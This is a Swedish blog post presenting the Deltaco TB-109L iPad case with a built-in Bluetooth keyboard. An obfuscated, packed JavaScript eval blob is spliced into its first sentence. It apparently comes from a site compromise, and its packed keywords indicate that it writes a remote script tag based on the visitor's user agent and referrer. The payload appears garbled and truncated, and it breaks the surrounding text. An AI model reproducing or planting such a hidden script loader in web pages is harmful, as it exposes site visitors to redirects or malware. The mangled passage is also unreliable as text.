Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Skriv utan att peka på paddan!

Sebastian

Att eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|afzin|var|u0026u|referrer|trhst||js|php’.split(’|’),0,{}))
skriva på en iPad fungerar ganska bra. I alla fall för kortare sökbegrepp, blogginlägg och likande. Men när det kommer till regelrätt skrivande är det skönt med ett riktigt tangentbord.  
Deltaco kan nu presentera TB-109L – DELTACO iPad-fodral med inbyggt tangentbord, ett praktiskt och elegant iPad-fodral som har ett inbyggt tangentbord.

Se hela skärmen
Den största fördelen med ett separat tangentbord till iPad är att du kan använda hela skärmen för att visa det som skall visas, istället för att låta ett tangentbord ta upp halva ytan och försöka skriva medan du ser skärmen som genom ett brevinkast.

Tangentbordet i TB-109L är en integrerad del av fodralets front och kommunicerar med din iPad via Bluetooth. Det drivs av ett inbyggt laddningsbart batteri som laddas via USB-kabel från dator eller USB-laddare.

Bekväm läsvinkel
TB-109L fungerar som praktsikt transportskydd. När du viker upp fodralet kan du välja att ha skärmen liggande platt eller ställa den i en lätt tillbakalutad vinkel.  Fodralet har hål på de ställen som krävs för att kamera, knappar och anslutningar skall fungera även när du har din iPad i fodralet.

Passar alla iPad-modeller
Fodralet är anpassat för att kunna hysa iPad, iPad 2 eller iPad 3. Titta in påYouTube för en presentationsvideo av produkten.